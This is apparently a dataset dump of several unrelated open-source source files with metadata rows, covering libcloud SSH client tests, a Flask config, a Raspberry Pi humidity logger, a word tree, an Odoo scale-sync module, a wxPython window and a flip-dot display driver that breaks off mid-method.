if update:
presentation = Presentation.objects.update_or_create(papercall_id=data['papercall_id'], defaults=data)[0]
else:
presentation = Presentation.objects.get_or_create(papercall_id=data.pop('papercall_id'), defaults=data)[0]
return presentation
| mit | -8,678,908,933,507,373,000 | 31.008621 | 118 | 0.590358 | false | 4.084708 | false | false | false |
Jc2k/libcloud | libcloud/test/compute/test_ssh_client.py | 2 | 7148 | # -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import with_statement
import sys
import unittest
from libcloud.compute.ssh import ParamikoSSHClient
from libcloud.compute.ssh import ShellOutSSHClient
from libcloud.compute.ssh import have_paramiko
from mock import patch, Mock
if not have_paramiko:
ParamikoSSHClient = None
class ParamikoSSHClientTests(unittest.TestCase):
@patch('paramiko.SSHClient', Mock)
def setUp(self):
"""
Creates the object patching the actual connection.
"""
conn_params = {'hostname': 'dummy.host.org',
'port': 8822,
'username': 'ubuntu',
'key': '~/.ssh/ubuntu_ssh',
'timeout': '600'}
self.ssh_cli = ParamikoSSHClient(**conn_params)
@patch('paramiko.SSHClient', Mock)
def test_create_with_password(self):
"""
Initialize object with password.
Just to have better coverage, initialize the object
with the 'password' value instead of the 'key'.
"""
conn_params = {'hostname': 'dummy.host.org',
'username': 'ubuntu',
'password': 'ubuntu'}
mock = ParamikoSSHClient(**conn_params)
mock.connect()
expected_conn = {'username': 'ubuntu',
'password': 'ubuntu',
'allow_agent': False,
'hostname': 'dummy.host.org',
'look_for_keys': False,
'port': 22}
mock.client.connect.assert_called_once_with(**expected_conn)
@patch('paramiko.SSHClient', Mock)
def test_create_without_credentials(self):
"""
Initialize object with no credentials.
Just to have better coverage, initialize the object
without 'password' neither 'key'.
"""
conn_params = {'hostname': 'dummy.host.org',
'username': 'ubuntu'}
mock = ParamikoSSHClient(**conn_params)
mock.connect()
expected_conn = {'username': 'ubuntu',
'hostname': 'dummy.host.org',
'allow_agent': True,
'look_for_keys': True,
'port': 22}
mock.client.connect.assert_called_once_with(**expected_conn)
def test_basic_usage_absolute_path(self):
"""
Basic execution.
"""
mock = self.ssh_cli
# script to execute
sd = "/root/random_script.sh"
# Connect behavior
mock.connect()
mock_cli = mock.client # The actual mocked object: SSHClient
expected_conn = {'username': 'ubuntu',
'key_filename': '~/.ssh/ubuntu_ssh',
'allow_agent': False,
'hostname': 'dummy.host.org',
'look_for_keys': False,
'timeout': '600',
'port': 8822}
mock_cli.connect.assert_called_once_with(**expected_conn)
mock.put(sd)
# Make assertions over 'put' method
mock_cli.open_sftp().chdir.assert_called_with('root')
mock_cli.open_sftp().file.assert_called_once_with('random_script.sh',
mode='w')
mock.run(sd)
# Make assertions over 'run' method
mock_cli.get_transport().open_session().exec_command \
.assert_called_once_with(sd)
mock.close()
def test_delete_script(self):
"""
Provide a basic test with 'delete' action.
"""
mock = self.ssh_cli
# script to execute
sd = '/root/random_script.sh'
mock.connect()
mock.delete(sd)
# Make assertions over the 'delete' method
mock.client.open_sftp().unlink.assert_called_with(sd)
mock.close()
if not ParamikoSSHClient:
class ParamikoSSHClientTests(unittest.TestCase):
pass
class ShellOutSSHClientTests(unittest.TestCase):
def test_password_auth_not_supported(self):
try:
ShellOutSSHClient(hostname='localhost', username='foo',
password='bar')
except ValueError:
e = sys.exc_info()[1]
msg = str(e)
self.assertTrue('ShellOutSSHClient only supports key auth' in msg)
else:
self.fail('Exception was not thrown')
def test_ssh_executable_not_available(self):
class MockChild(object):
returncode = 127
def communicate(*args, **kwargs):
pass
def mock_popen(*args, **kwargs):
return MockChild()
with patch('subprocess.Popen', mock_popen):
try:
ShellOutSSHClient(hostname='localhost', username='foo')
except ValueError:
e = sys.exc_info()[1]
msg = str(e)
self.assertTrue('ssh client is not available' in msg)
else:
self.fail('Exception was not thrown')
def test_connect_success(self):
client = ShellOutSSHClient(hostname='localhost', username='root')
self.assertTrue(client.connect())
def test_close_success(self):
client = ShellOutSSHClient(hostname='localhost', username='root')
self.assertTrue(client.close())
def test_get_base_ssh_command(self):
client1 = ShellOutSSHClient(hostname='localhost', username='root')
client2 = ShellOutSSHClient(hostname='localhost', username='root',
key='/home/my.key')
client3 = ShellOutSSHClient(hostname='localhost', username='root',
key='/home/my.key', timeout=5)
cmd1 = client1._get_base_ssh_command()
cmd2 = client2._get_base_ssh_command()
cmd3 = client3._get_base_ssh_command()
self.assertEquals(cmd1, ['ssh', 'root@localhost'])
self.assertEquals(cmd2, ['ssh', '-i', '/home/my.key',
'root@localhost'])
self.assertEquals(cmd3, ['ssh', '-i', '/home/my.key',
'-oConnectTimeout=5', 'root@localhost'])
if __name__ == '__main__':
sys.exit(unittest.main())
| apache-2.0 | -8,181,954,370,134,637,000 | 34.381188 | 78 | 0.564433 | false | 4.363248 | true | false | false |
jlgoldman/writetogov | app/app_config.py | 1 | 1372 | import logging
import sys
from config import constants
from database import db
from util import sendgrid_
class AppConfig(object):
SECRET_KEY = constants.FLASK_SECRET_KEY
CSRF_ENABLED = True
SQLALCHEMY_DATABASE_URI = constants.SQLALCHEMY_DATABASE_URI
SQLALCHEMY_TRACK_MODIFICATIONS = False
SQLALCHEMY_ECHO = False
def init_app(app):
db.init_app(app)
def init_prod_app(app):
app.config.from_object(__name__ + '.AppConfig')
init_app(app)
if not constants.DEBUG:
setup_log_handlers(app)
return app
def setup_log_handlers(app):
log_level = logging.WARNING
log_formatter = logging.Formatter(
'%(asctime)s %(levelname)s [in %(pathname)s:%(lineno)d]: %(message)s')
log_handlers = [
logging.StreamHandler(sys.stdout) if constants.LOG_TO_STDOUT else logging.FileHandler(constants.APP_LOG_FILENAME),
new_smtp_log_handler(),
]
app.logger.setLevel(log_level)
for log_handler in log_handlers:
log_handler.setLevel(log_level)
log_handler.setFormatter(log_formatter)
app.logger.addHandler(log_handler)
return app
def new_smtp_log_handler():
return sendgrid_.SendgridEmailLogHandler(
None, # No server needed, we're using sendgrid instead of SMTP
None,
constants.MONITORING_NOTIFICATION_EMAILS,
'WriteToGov Error')
| bsd-3-clause | 8,961,461,953,709,691,000 | 28.191489 | 122 | 0.685131 | false | 3.517949 | false | false | false |
86reddawg/PiDataRecorder | pidatarecorder.py | 1 | 2519 | #!/usr/bin/python
'''
Temp/Humidity Monitor - written by Joshua Hughes, 10/20/14
Must be run as root.
Records temperature and percent humidity from Adafruit DHT11/22 or AM2302 sensors once per minute
Calculates absolute humidity and dumps data into a database
Create an sqlite3 database and setup table with something like:
create table data(temp INTEGER, relhum INTEGER, abshum INTEGER, stamp DATETIME default CURRENT_TIMESTAMP);
'''
import time, datetime, sys, logging, Adafruit_DHT, math
import sqlite3 as sql
#Type of Adafruit sensor:
#DHT11 = 11
#DHT22 = 22
#AM2302 = 22
sensor = 22
pin = 18
db = '/home/pi/recorder.db'
log = '/var/log/temp.log'
#Math Constants for Humidity conversion
c1 = -7.85951783
c2 = 1.84408259
c3 = -11.7866497
c4 = 22.6807411
c5 = -15.9618719
c6 = 1.80122502
c7 = 2.16679
Tc = 647.096 # Critical Temp, K
Pc = 22064000 # Critical Pressure, Pa
#Wagner-equation term: (1 - T/Tc)**p, with T converted from Celsius to kelvin
def v(T, p):
return math.pow(1 - (273.15 + T) / Tc, p)
#Calculate Water Vapor Saturation Pressure, Pws
def Pws(T):
return Pc * math.exp( Tc * (c1*v(T,1) + c2*v(T,1.5) + c3*v(T,3) + c4*v(T,3.5) + c5*v(T,4) + c6*v(T,7.5)) / (273.15+T) )
#Calculate Water Vapor Pressure, Pw
def Pw(T,RH):
return Pws(T) * RH / 100
#Calculate Absolute Humidity
def AbsHum(T,RH):
return c7 * Pw(T,RH) / (273.15 + T)
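#Illustrative check (approximate, based on standard reference values): at
#T = 25 C and RH = 50 %, Pws(25) is about 3.17 kPa, so AbsHum(25, 50) is
#roughly 11.5 g/m^3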
def InitLogger():
global logger
logger = logging.getLogger('Temp')
hdlr = logging.FileHandler(log)
hdlr.setFormatter(logging.Formatter('%(message)s'))
logger.addHandler(hdlr)
logger.setLevel(logging.WARNING)
if __name__ == "__main__":
global logger
InitLogger()
con = sql.connect(db)
ts = datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S')
logger.warning('\n'+ts+' - Sensor Startup')
while True:
relhum, temperature = Adafruit_DHT.read_retry(sensor,pin)
abshum = AbsHum(temperature, relhum)
#convert temp from C to F:
temperature = temperature * 9 / 5 + 32
ts = datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S')
output = ts + ' - Temp={0:0.1f}*F Relative Humidity={1:0.1f}% Absolute Humidity={2:0.1f}'.format(temperature, relhum, abshum)
logger.warning(output)
print output
sqlinsert = "INSERT INTO data(temp, relhum, abshum, stamp) VALUES("+"{0:.2f}".format(temperature)+","+"{0:.2f}".format(relhum)+","+"{0:.2f}".format(abshum)+",CURRENT_TIMESTAMP)"
with con:
cur = con.cursor()
cur.execute(sqlinsert)
#TODO - add averager instead of sleep?
time.sleep(60)
| gpl-2.0 | 1,882,497,555,781,134,600 | 28.290698 | 178 | 0.681223 | false | 2.70279 | false | false | false |
jlettvin/Unicode | py2/Tree.py | 1 | 5174 | #!/usr/bin/env python
# -*- coding: utf8 -*-
"""
This module creates word trees, splices, prunes, and queries.
"""
__module__ = "Tree.py"
__author__ = "Jonathan D. Lettvin"
__copyright__ = "\
Copyright(C) 2016 Jonathan D. Lettvin, All Rights Reserved"
__credits__ = ["Jonathan D. Lettvin"]
__license__ = "GPLv3"
__version__ = "0.0.3"
__maintainer__ = "Jonathan D. Lettvin"
__email__ = "[email protected]"
__contact__ = "[email protected]"
__status__ = "Demonstration"
__date__ = "20161102"
from CPT import CPT
# CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
class Tree(set):
"""
Tree instances as unitree, a tree for fast specified word lookup.
unitree(word) functor adds word to tree.
    unitree[word] getitem returns the stored word set (truthy) if word is in tree, else False.
unitree(word, "delete") remove word from tree
unitree.delete(word) remove word from tree
unitree.word(word, variant) add variant targeting word to tree
A word or list of words may be given while instancing.
A word or list of words may be added after instancing by functor.
For canonicalization of word variants, the terminal is a set such that
common tree variations for dissimilar words can have multiple results.
    TODO: when deleting word, delete its variations (remove from word lists).
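    Example (illustrative)::
        unitree = Tree(wordlist=[u"cat", u"car"])
        unitree[u"cat"]            # -> set([u"cat"]) (truthy)
        unitree(u"cat", "delete")  # prunes "cat" from the tree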
"""
def __init__(self, **kw):
self.kw = kw
self.wordlist = kw.get('wordlist', [])
self.case = kw.get('ignorecase', False)
self.end = kw.get('end', 0xFFFF) # non-codepoint usable as end key.
self.tree = {} # CPT() # {}
self(self.wordlist)
def word(self, root, also=None):
"For a word, insert it into tree or retrieve it from tree"
if isinstance(also, list):
for variation in also:
self.word(root, variation)
return self
fork = self.tree
if not also:
also = root
for o in (ord(c) for c in also): # iteration costs less than recursion
fork[o] = fork.get(o, {})
fork = fork[o]
if not fork.get(self.end):
fork[self.end] = set([root])
else:
fork[self.end].add(root)
self.add(root)
return self
def __call__(self, word, *args):
"word or delete a word or list of words to the tree"
if isinstance(word, list):
map(self, word)
else:
if "delete" in args:
self.delete(word)
else:
self.word(word)
self.add(word)
# TODO: internal variations mechanism doesn't work yet.
# for variant in Tree.variations(word):
# self.word(word, variant)
return self
def delete(self, root, tree=False, level=0, N=0):
"Prune a word or list of words from the tree"
# TODO delete variations as well as root
if tree is False:
tree = self.tree
N = len(root)
level = 0
if N <= level:
self.discard(root)
unique = (tree and (len(tree) == 1))
terminal = tree and self.end in tree
if terminal:
tree[self.end].discard(root)
return unique and terminal
C = root[level]
O = ord(C)
if O in tree:
if self.delete(root, tree[O], level + 1, N) and len(tree) == 1:
del tree[O]
return True
return False
def _graphviz(self, tree, token=u""):
text = u""
for k, w in tree.iteritems():
if k == self.end:
terminal = u','.join(w)
text += u'"%s" -> "[%s]" [label="$"];\n' % (token, terminal)
text += u'"[%s]" -> "STOP";\n' % (terminal)
else:
newtoken = token + unichr(k)
text += u'"%s";\n' % (newtoken)
                if token != u"":
label = u'[label="' + unichr(k) + u'"];'
text += u'"%s" -> "%s" %s\n' % (token, newtoken, label)
text += self._graphviz(w, newtoken)
                if tree == self.tree:
                    fmt = '"START" -> "%s" [label="%s"];\n'
                    text += fmt % (newtoken, unichr(k))
return text
def graphviz(self, dotname="Tree.dot"):
"Produce .dot file for use by graphviz external program"
head = 'digraph tree {\n rankdir=LR;\n concentrate=true;\n'
tail = "}"
with open(dotname, "w+b") as dotstream:
try:
print>>dotstream, head + self._graphviz(self.tree) + tail
except Exception as why: # pylint: disable=broad-except
print("Can't output: %s(%s)" % (dotname, str(why)))
finally:
pass
def __getitem__(self, find):
"Find in the tree"
fork = self.tree
for o in (ord(c) for c in find):
fork = fork.get(o, {})
if fork == {}:
break
return fork.get(self.end, False)
| gpl-3.0 | 122,155,553,994,677,650 | 33.724832 | 79 | 0.52242 | false | 3.733045 | false | false | false |
houssine78/addons | product_to_scale_bizerba_extended/models/product.py | 1 | 5761 | # -*- coding: utf-8 -*-
# Copyright (C) 2014 GRAP (http://www.grap.coop)
# Copyright © 2017 Coop IT Easy (http://www.coopiteasy.be)
# @author: Sylvain LE GAL (https://twitter.com/legalsylvain)
# @author: Houssine BAKKALI (https://github.com/houssine78)
# @author: Rémy TAYMANS <[email protected]>
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).
from datetime import datetime
from openerp import api, fields, models, _
import openerp.addons.decimal_precision as dp
# TODO: scale_category is defined in beesdoo_product but this module do
# not depend on it. Find a way to configure these fields.
ADDITIONAL_FIELDS = ['list_price', 'scale_category', 'image_medium']
class ProductTemplate(models.Model):
_inherit = 'product.template'
scale_group_id = fields.Many2one(
related="product_variant_ids.scale_group_id",
string='Scale Group',
store=True
)
scale_sequence = fields.Integer(
related="product_variant_ids.scale_sequence",
string='Scale Sequence',
store=True
)
scale_tare_weight = fields.Float(
related="product_variant_ids.scale_tare_weight",
string='Scale Tare Weight',
store=True,
help="Set here Constant tare weight"
" for the given product. This tare will be substracted when"
" the product is weighted. Usefull only for weightable product.\n"
"The tare is defined with kg uom."
)
# View Section
@api.multi
def send_scale_create(self):
for product in self:
# TODO: Should check if the product has a scale group
product._send_to_scale_bizerba('create', True)
return True
@api.multi
def send_scale_write(self):
for product in self:
# TODO: Should check if the product has a scale group
product._send_to_scale_bizerba('write', True)
return True
@api.multi
def send_scale_unlink(self):
for product in self:
# TODO: Should check if the product has a scale group
product._send_to_scale_bizerba('unlink')
return True
# Custom Section
def _send_to_scale_bizerba(self, action, send_product_image=False):
log_obj = self.env['product.scale.log']
log_obj.create({
'log_date': datetime.now().strftime('%Y-%m-%d %H:%M:%S'),
'scale_system_id': self.scale_group_id.scale_system_id.id,
'product_id': self.id,
'action': action,
'send_product_image': send_product_image,
})
def _check_vals_scale_bizerba(self, vals):
system = self.scale_group_id.scale_system_id
system_fields = [x.name for x in system.field_ids]
for product_field in ADDITIONAL_FIELDS:
if product_field not in system_fields:
system_fields.append(product_field)
vals_fields = vals.keys()
return set(system_fields).intersection(vals_fields)
def is_in_scale(self):
"""Return True if the current product should be in the scale
system.
"""
self.ensure_one()
return self.active and self.sale_ok and self.scale_group_id
def is_new_in_scale(self, vals):
"""Return True if the current product will be new in the scale
system after the write.
"""
return not self.is_in_scale() and self.will_be_in_scale(vals)
def will_be_in_scale(self, vals):
"""Return True if the current product will be in the scale
system after the write.
"""
self.ensure_one()
return (vals.get('active', self.active)
and vals.get('sale_ok', self.sale_ok)
and vals.get('scale_group_id', self.scale_group_id))
# Overload Section
@api.model
def create(self, vals):
product = super(ProductTemplate, self).create(vals)
if product.is_in_scale():
product._send_to_scale_bizerba('create')
return product
@api.multi
def write(self, vals):
defered = {}
for product in self:
if product.is_new_in_scale(vals):
# Product is new to the scale system: create it.
defered[product.id] = 'create'
elif product.is_in_scale() and product.will_be_in_scale(vals):
# Product is in the scale system and will be in the
# scale system after the write: if there is changes in
# the fields related to the scale system, update it.
if product._check_vals_scale_bizerba(vals):
defered[product.id] = 'write'
# If scale_group has change, product must be updated.
if ('scale_group_id' in vals
and vals['scale_group_id'] != product.scale_group_id):
# Remove it from previous group
product._send_to_scale_bizerba('unlink')
# Send it in the new group
defered[product.id] = 'create'
elif product.is_in_scale() and not product.will_be_in_scale(vals):
# Product is in the scale system and will no longer be
# in the scale system after the write: delete it.
defered[product.id] = 'unlink'
res = super(ProductTemplate, self).write(vals)
for product_id, action in defered.iteritems():
product = self.browse(product_id)
product._send_to_scale_bizerba(action, True)
return res
@api.multi
def unlink(self):
for product in self:
if product.is_in_scale():
                product._send_to_scale_bizerba('unlink')
return super(ProductTemplate, self).unlink()
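# A hypothetical walk-through of the action resolution in write() above
# (field values are illustrative, not taken from a real database):
#
#     # product is currently active, saleable and assigned to a scale group
#     product.write({'active': False})      # -> 'unlink' is sent to the scale
#     product.write({'list_price': 2.5})    # -> 'write' (scale-relevant field)
#     product.write({'scale_group_id': 7})  # -> 'unlink' old group, then 'create'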
# File: manuelcortez/socializer/src/wxUI/mainWindow.py
# -*- coding: utf-8 -*-
import wx
import wx.adv
import application
from pubsub import pub
class mainWindow(wx.Frame):
def makeMenu(self):
mb = wx.MenuBar()
app_ = wx.Menu()
create = wx.Menu()
self.audio_album = create.Append(wx.NewId(), _("Audio album"))
self.video_album = create.Append(wx.NewId(), _("Video album"))
app_.Append(wx.NewId(), _("Create"), create)
delete = wx.Menu()
self.delete_audio_album = delete.Append(wx.NewId(), _("Audio album"))
self.delete_video_album = delete.Append(wx.NewId(), _("Video album"))
app_.Append(wx.NewId(), _("Delete"), delete)
self.blacklist = app_.Append(wx.NewId(), _("Blacklist"))
self.accounts = app_.Append(wx.NewId(), _("Manage accounts"))
self.settings_dialog = app_.Append(wx.NewId(), _("Preferences"))
me = wx.Menu()
profile = wx.Menu()
self.view_profile = profile.Append(wx.NewId(), _("View profile"))
# self.edit_profile = profile.Append(wx.NewId(), _("Edit profile"))
self.open_in_browser = profile.Append(wx.NewId(), _("Open in browser"))
me.Append(wx.NewId(), _("Profile"), profile)
self.set_status = me.Append(wx.NewId(), _("Set status message"))
buffer = wx.Menu()
search = wx.Menu()
self.search_audios = search.Append(wx.NewId(), _("Audio"))
self.search_videos = search.Append(wx.NewId(), _("Video"))
self.timeline = buffer.Append(wx.NewId(), _("&New timeline"))
buffer.Append(wx.NewId(), _("Search"), search)
self.update_buffer = buffer.Append(wx.NewId(), _("Update current buffer"))
self.load_previous_items = buffer.Append(wx.NewId(), _("Load previous items"))
self.remove_buffer_ = buffer.Append(wx.NewId(), _("&Remove buffer"))
mb.Append(app_, _("Application"))
mb.Append(me, _("Me"))
mb.Append(buffer, _("Buffer"))
player = wx.Menu()
self.player_play = player.Append(wx.NewId(), _("Play/Pause"))
self.player_play_all = player.Append(wx.NewId(), _("Play all"))
self.player_previous = player.Append(wx.NewId(), _("Previous"))
self.player_next = player.Append(wx.NewId(), _("Next"))
self.player_shuffle = player.AppendCheckItem(wx.NewId(), _("Shuffle"))
self.player_seek_left = player.Append(wx.NewId(), _("Seek backwards"))
self.player_seek_right = player.Append(wx.NewId(), _("Seek forwards"))
self.player_volume_up = player.Append(wx.NewId(), _("Volume up"))
self.player_volume_down = player.Append(wx.NewId(), _("Volume down"))
self.player_mute = player.Append(wx.NewId(), _("Mute"))
help_ = wx.Menu()
self.about = help_.Append(wx.NewId(), _("About {0}").format(application.name,))
self.documentation = help_.Append(wx.NewId(), _("Manual"))
self.check_for_updates = help_.Append(wx.NewId(), _("Check for updates"))
self.changelog = help_.Append(wx.NewId(), _("Chan&gelog"))
self.open_logs = help_.Append(wx.NewId(), _("Open logs directory"))
self.open_config = help_.Append(wx.NewId(), _("Open config directory"))
self.report = help_.Append(wx.NewId(), _("Report an error"))
mb.Append(player, _("Audio player"))
mb.Append(help_, _("Help"))
self.SetMenuBar(mb)
self.accel_tbl = wx.AcceleratorTable([
# Assign keystrokes to control the player object.
(wx.ACCEL_ALT, wx.WXK_LEFT, self.player_previous.GetId()),
(wx.ACCEL_ALT, wx.WXK_RIGHT, self.player_next.GetId()),
(wx.ACCEL_ALT, wx.WXK_DOWN, self.player_volume_down.GetId()),
(wx.ACCEL_ALT, wx.WXK_UP, self.player_volume_up.GetId()),
# Translators: Keystroke used to play/pause the current item in the playback queue. Use the latin alphabet, but you can match a different key here. For example if you want to assign this to the key "П", use G.
(wx.ACCEL_CTRL, ord(_("P")), self.player_play.GetId()),
(wx.ACCEL_CTRL|wx.ACCEL_SHIFT, ord(_("P")), self.player_play_all.GetId()),
(wx.ACCEL_ALT|wx.ACCEL_SHIFT, wx.WXK_LEFT, self.player_seek_left.GetId()),
(wx.ACCEL_ALT|wx.ACCEL_SHIFT, wx.WXK_RIGHT, self.player_seek_right.GetId()),
])
self.SetAcceleratorTable(self.accel_tbl)
def __init__(self):
super(mainWindow, self).__init__(parent=None, id=wx.NewId(), title=application.name)
self.Maximize()
self.makeMenu()
self.panel = wx.Panel(self)
self.sizer = wx.BoxSizer(wx.VERTICAL)
self.sb = self.CreateStatusBar()
self.tb = wx.Treebook(self.panel, -1)
self.sizer.Add(self.tb, 1, wx.ALL|wx.EXPAND, 5)
pub.subscribe(self.change_status, "change_status")
def realize(self):
self.panel.SetSizer(self.sizer)
self.SetClientSize(self.sizer.CalcMin())
self.Layout()
self.SetSize(self.GetBestSize())
def change_status(self, status):
wx.CallAfter(self.sb.SetStatusText, status)
def connection_error(self):
wx.MessageDialog(self, _("There is a connection error. Check your internet connection and try again later."), _("Connection error"), wx.ICON_ERROR).ShowModal()
def get_buffer_count(self):
return self.tb.GetPageCount()
def add_buffer(self, buffer, name):
self.tb.AddPage(buffer, name)
def insert_buffer(self, buffer, name, pos):
return self.tb.InsertSubPage(pos, buffer, name)
def insert_chat_buffer(self, buffer, name, pos):
return self.tb.InsertPage(pos, buffer, name)
def search(self, name_):
for i in range(0, self.tb.GetPageCount()):
if self.tb.GetPage(i).name == name_: return i
def get_current_buffer(self):
return self.tb.GetCurrentPage()
def get_current_buffer_pos(self):
return self.tb.GetSelection()
def get_buffer(self, pos):
        return self.tb.GetPage(pos)
def change_buffer(self, position):
self.tb.ChangeSelection(position)
def get_buffer_text(self, pos=None):
        if pos is None:
pos = self.tb.GetSelection()
return self.tb.GetPageText(pos)
def get_buffer_by_id(self, id):
        return self.tb.FindWindowById(id)
def advance_selection(self, forward):
self.tb.AdvanceSelection(forward)
def about_dialog(self, channel="stable", *args, **kwargs):
if channel == "stable":
version = _("{version} (stable)").format(version=application.version)
else:
version = _("{version} (alpha)").format(version=application.update_next_version)
info = wx.adv.AboutDialogInfo()
info.SetName(application.name)
info.SetVersion(version)
info.SetDescription(application.description)
info.SetCopyright(application.copyright)
info.SetTranslators(application.translators)
# info.SetLicence(application.licence)
info.AddDeveloper(application.author)
wx.adv.AboutBox(info)
def remove_buffer(self, pos):
self.tb.DeletePage(pos)
def remove_buffer_from_position(self, pos):
return self.tb.RemovePage(pos)
def notify(self, title, text):
self.notification = wx.adv.NotificationMessage(title=title, message=text, parent=self)
        self.notification.Show()
# File: Kiganshee/Flip-Sign/DisplayClasses.py
from PIL import Image
from PIL import ImageFont
from PIL import ImageDraw
from TransitionFunctions import *
import copy
import struct
import serial
from MessageClasses import *
class Display(object):
"""
This class represents a display -- it has properties that specify its width and number of lines.
It also has a property that represents its current state (e.g. what it is currently displaying).
It has an update method which is fed a display object, a transition function and a delay.
The transition function takes in a current display state and a desired display state, then returns
a list of intermediate display states that need to be transitioned through.
A display state is stored as a list of length num_lines that contains only strings of length num_chars.
"""
def __init__(self, num_lines, num_chars):
self.num_lines = num_lines
self.num_chars = num_chars
self.currentstate = [' '*num_chars]*num_lines
def determine_transition(self, transitionfunction, messageobject):
messageobject.update(num_lines=self.num_lines, num_chars=self.num_chars)
return transitionfunction(self.currentstate, messageobject.get_message())
def update(self, transitionfunction, messageobject):
# this will be different for each display type, so must be overridden
raise NotImplementedError
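# A minimal sketch of a transition function usable with
# Display.determine_transition() above (illustrative; the real transitions
# are imported from TransitionFunctions):
#
#     def immediate_transition(currentstate, desiredstate):
#         # jump straight from the current state to the desired one,
#         # with no intermediate frames
#         return [desiredstate]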
class SimpleDisplay(Display):
"""
This class is the simplest display possible - it just prints the info to the console.
"""
    def __init__(self, num_lines, num_chars):
Display.__init__(self, num_lines, num_chars)
def update(self, transitionfunction, messageobject):
states = self.determine_transition(transitionfunction, messageobject)
for i in range(len(states)):
print(states[i])
class SerialLCDDisplay(Display):
"""
This class is an LCD display controlled via serial -- it takes in a bytestring of length num_chars * num_lines and
displays it.
"""
def __init__(self, num_lines, num_chars, device, frequency, reactiontime):
"""
:param num_lines: number of lines in the display
:param num_chars: number of characters in each line of the display
:param device: device location of the serial connection (e.g. '/dev/tty.usbserial')
:param frequency: baud rate of the connection (e.g. 9600)
:param reactiontime: delay between each update action, seconds
"""
Display.__init__(self, num_lines, num_chars)
self.device = device
self.frequency = frequency
self.reactiontime = reactiontime
def update(self, transitionfunction, messageobject):
import serial
import time
ser = serial.Serial(self.device, self.frequency)
time.sleep(self.reactiontime)
states = self.determine_transition(transitionfunction, messageobject)
print("Attempting to display ", messageobject)
for i in range(len(states)):
output = ""
for z in range(self.num_lines):
output += states[i][z]
ser.write(output.encode(encoding='us-ascii', errors='strict'))
time.sleep(self.reactiontime)
ser.close()
class FlipDotDisplay(Display):
"""
This class represents a rectangular array of flip dot displays from AlfaZeta, arranged in an arbitrary layout.
"""
def __init__(self, rows, columns, serialinterface, layout):
"""
Initializes the display.
:param rows: Integer number of rows in the display
:param columns: Integer number of columns in the display
:param layout: A dictionary, with keys being (row,column) tuples. layout[(row,column)]
should return a tuple (displayID,bytenum,powerof2)
:param serialinterface: A python serial module object, representing the serial interface of the actual display
"""
# Make sure variables are of the right type. For layout, only make sure it has the right dimensions
assert type(rows) == int
assert type(columns) == int
assert isinstance(serialinterface, serial.Serial)
self.rows = rows
self.columns = columns
self.layout = copy.deepcopy(layout)
self.serial = serialinterface
self.invert = False
# determine indices of displays and number of bytes
# display is a dictionary of the displays, indexed by their identifier
# each element of the dictionary is an integer (number of bytes)
# this loop determines the largest bytenum for each display
display = {}
for pixel in layout:
if layout[pixel][0] in display:
if layout[pixel][1] > display[layout[pixel][0]]:
display[layout[pixel][0]] = layout[pixel][1]
else:
display[layout[pixel][0]] = layout[pixel][1]
# turn the display dictionary into a dictionary of lists, each list the length of the bytes in the display
# default empty state is 0 (all pixels in column black)
for disp in display:
temp = display[disp]
display[disp] = [0]*(temp + 1)
self.emptystate = copy.deepcopy(display)
# initialize current state to all black and then set the display to it
self.currentstate = Image.new('1', (self.columns, self.rows), 0)
self.show(self.currentstate)
self.currentmessage = None
def flip_invert(self):
"""
Swaps display from inverted to not inverted or vice versa
:return:
"""
self.invert = not self.invert
def get_invert(self):
"""
Safe way to determine whether the display is inverted
:return: boolean, indicating whether colors are inverted or not
"""
return self.invert
def show(self, desiredstate):
"""
Writes the desired state to the display.
:param desiredstate: a PIL image object, of dimensions (rows,columns)
:return: None
"""
        # sanity check: the desired image dimensions must match the display exactly
assert (self.columns, self.rows) == desiredstate.size
# turn desiredstate into a list of lists, with desiredstate[row][column] returning the pixel direction
pixel = list(desiredstate.getdata())
pixels = [pixel[i * self.columns: (i + 1) * self.columns] for i in range(self.rows)]
# start with generic command strings
head = b'\x80'
tail = b'\x8F'
cmd = b'\x84'
refresh = head + b'\x82' + tail
cmdstring = b''
display = copy.deepcopy(self.emptystate)
# first need to use self.layout to turn the pixels array into the display IDs and byte values
# iterate through all the rows and columns in the desired state
for row in range(len(pixels)):
for column in range(len(pixels[row])):
# sometimes white will be 255, sometimes it will be 1
# this code needs white to be 1 for calculation purposes
# sanitize 255 into 1, or just use as is
if pixels[row][column] == 255:
pixel = 1
else:
pixel = pixels[row][column]
# if display is inverted, turn 1 into 0 and vice versa, otherwise leave as is
if self.invert:
pixel = 1 - pixel
# display[displaynum from layout] [ bytenum from layout] incremented by the pixels value * power
# of 2 from layout
display[self.layout[(row, column)][0]][self.layout[(row, column)][1]] +=\
pixel * 2 ** self.layout[(row, column)][2]
# iterate through the displays and turn them into the proper byte arrays
for disp in display:
# start off each command with a head and command string
# add the display address
# to generate bytes for the address, use struct.pack('=b',ADDRESS)
# add the actual command string- use the bytearray function to turn the list of integers into the byte array
cmdstring += head + cmd + struct.pack('=b', disp) + bytearray(display[disp]) + tail
# once done, add the refresh command to the end of the command string
cmdstring += refresh
# write the command to the serial interface
self.serial.write(cmdstring)
    def update(self, transitionfunction, displayobject, font):
# Ensure proper types
assert isinstance(displayobject, Message) or isinstance(displayobject, Image.Image)
if isinstance(displayobject, Message):
assert isinstance(font, ImageFont.FreeTypeFont)
assert callable(transitionfunction)
assert transitionfunction.is_message_transition or transitionfunction.is_display_transition
displaystates = []
# if an image
if isinstance(displayobject, Image.Image):
# either crop it to fit the display (keep top left) or pad to fill (center)
# first check if either of the dimensions are too big
image_for_transition = displayobject
if displayobject.size[0] > self.columns or displayobject.size[1] > self.rows:
horizontalcrop = max(displayobject.size[0] - self.columns, 0)
verticalcrop = max(displayobject.size[1] - self.rows, 0)
